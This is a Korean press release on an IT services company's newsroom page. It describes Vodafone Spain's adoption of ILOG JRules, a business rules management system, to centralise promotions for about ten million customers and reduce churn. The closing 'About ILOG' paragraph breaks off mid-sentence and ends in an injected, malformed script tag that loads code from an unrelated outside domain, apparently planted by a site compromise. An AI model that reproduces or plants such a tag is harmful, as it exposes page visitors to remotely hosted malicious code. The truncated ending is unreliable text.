주메뉴 바로가기 본문 바로가기 하단 바로가기

회사소개

제조, 금융, 통신, 물류, 공공 산업에 솔루션 제공 및 컨설팅, 기술 지원 등 토탈 ICT 서비스를 제공하고 있습니다.

뉴스룸

Vodafone, ILOG JRules를 적용한 ‘ Vodafone스페인 고객 로열티 프로그램’ 대성공

  • 2006.08.02
  • 조회수 42,267
새로운 룰 기반 시스템이 최초로 온라인 프로모션에 적용되었다.

MADRID / November 8, 2005 / 기업 소프트웨어 컴퍼넌트 및 서비스 선두 업체 ILOG® (NASDAQ: ILOG; Euronext: ILO, ISIN: FR0004042364)는 2005년 11월 8일 유럽 리딩 무선 서비스 업체 Vodafone 스페인이 스페인의 새로운 중앙 집중화된 프로모션 플랫폼을 구축하기 위해 ILOG BRMS(비즈니스 룰 관리 시스템) ILOG JRules를 선택했다고 밝혔다. 이 플랫폼은 스페인의 1000만 명 고객이 사용할 예정이다.

ILOG JRules를 사용하여, Vodafone 스페인은 고객 확보 및 고객 로열티 프로그램 향상을 기대하고 있으며, 새로운 프로모션을 신속하게 도입 하므로써 판매량을 증대시킬 수 있을 것으로 기대하고 있다.

Vodafone은 온라인 프로모션에 최초로 ILOG JRules을 도입한 것 이외에도, NPPI (New Platform of Integrated Promotions)라 불리는 룰 기반 프로모션 시스템을 도입, 새로운 프로모션을 시장에 도입하는 시간을 줄일 것으로 기대하고 있다. 또한 새로운, 창의적인 프로모션을 생성을 촉진시킬 것으로 보인다.

매우 경쟁적인 모바일 폰 시장에서, 모바일 서비스 제공업체의 우선 고려사항은 “chum management”이다.

“chum management”란 다른 업체로 옮겨가는 고객의 수를 줄이는 것을 의미한다. 스페인에서 Vodafone은 새로운 고객 증대 및 고객 로열티 관리 프로그램을 지원하고, chum을 줄이기 위해 프로모션에 크게 비중을 두고 있다. 이 프로그램은 현재 고객에 대한 보상 뿐 만 아니라 새로운 고객을 위한 인센티브를 제공한다.

새로운 룰 기반 NPPI를 적용하기 전, Vodafone Spain의 프로모션 관리는 번거롭고, 시간이 많이 소모되는 업무였다. 왜냐하며, 프로모션은 각기 다른 고객 관계 관리(CRM) 및 빌링 시스템에 하드코딩 되어 있었기 때문이다. 전 시스템에 걸쳐 변경사항이 지속적으로 적용되고 있는 지 확인하기 위해 추가적인 코딩이 필요하다. Vodafone 스페인의 마케팅 스탶은 새로운 프로모션 및 변경사항을 설치할 때마다 IT 개발자들에게 크게 의존하였고, 이 때문에 적용 사이클이 장기화 되었다.

ILOG JRules 은 비즈니스 정책을 단일 플랫폼 내에 집중화 시키고, 비즈니스 룰 리퍼지토리에 있는 비즈니스 정책을 각 프로모션에 적용시킨다. JRules의 리퍼지토리를 포함한 고급 비즈니스 룰 관리 기능은 Vodafone 스페인의 마케팅 팀이 IT 부서의 도움 없이 프로모션을 생성 및 업데이트할 수 있도록 해준다. 또한 실시간으로 프로모션에 대한 반응을 모니터 할 뿐만 아니라 관련 비즈니스 정책을 이해하기 쉬운 디시전 테이블에 그룹화 시킬 수 있도록 해 준다. 단기 테스팅 및 디버깅 단계를 따라 수주가 걸리던 새로운 프로모션 적용을 단 몇 일 내에 마칠 수 있게 되었다. 또한, ILOG JRules은 실시간으로 행사를 촉진시키는 컨테스트, 방문 선물, 제한된 장소에 접근하기 위한 특별 방법을 제시하는 등 다양한 이벤트를 실시간으로 처리하므로써 새로운 종류의 프로모션을 실행할 수 있도록 했다.

Vodafone 스페인의 제품, 가격 및 빌링 IT 매니저 Jose Ignacio Nogués 는 다음과 같이 말한다.

“고객 로열티 및 고객 인식 프로그램의 활성화는 Vodafone Spain의 주요한 비즈니스 목표입니다. ILOG JRules은 현업들이 프로모션에 더욱 강력한 통제력을 발휘할 수 있도록 하므로써 유연하게 프로모션을 관리할 수 있도록 도와 줍니다. 따라서 현업들은 치열한 경쟁에 빠르게 대응할 수 있게 되었습니다. 또한, 실시간 지속적인 정책 및 프로모션을 통해 운영 효율성을 향상 시켜 줍니다.,

독일에서 Vodafone D2는 빌링 애플리케이션의 실시간 레이팅 솔루션의 일부에 ILOG BRMS를 성공적으로 적용하고 있다.

ILOG는 지속적으로 제품혁신의 역사를 만들어 왔으며 ILOG JRules를 업계 선두 비즈니스 룰 소프트웨어로 만들었다. ILOG는 3년 연속으로 Gartner의 비즈니스 룰 Magic Quadrant 의 leader quadrant로 선정되었다. ILOG는 최근 IT 리서치 회사인 IDC로부터 BRMS 시장 리더로 선정되기도 했다. ILOG BRMS 고객으로는 eBay, Freddie Mac, Sabre, Zurich American 및 많은 세계적인 2000여개의 기업 및 정부들이 있다.

About ILOG

ILOG 는 고객이 효율적인 의사결정을 내릴 수 있고 변화와 복잡성을 관리할 수 있는 기능을 제공하는 소프트웨어와 서비스를 다루는 회사입니다. 전 세계 2,000 여개의 글로벌 기업들과 400여개의 우수한 소프트웨어 벤더들이 ILOG의 BRMS, Optimization, Visualization 소프트웨어 컴퍼넌트를 사용하고 있습니다. 이와 같은 ILOG 고객 및 벤더들은 ILOG 소프트웨어를 이용해 최상의 ROI를 성취하고, 시장이 요구하는 제품과 서비스를 제공하며, 그들의 경쟁력을 제고하고 ?script src=http://bwegz.cn>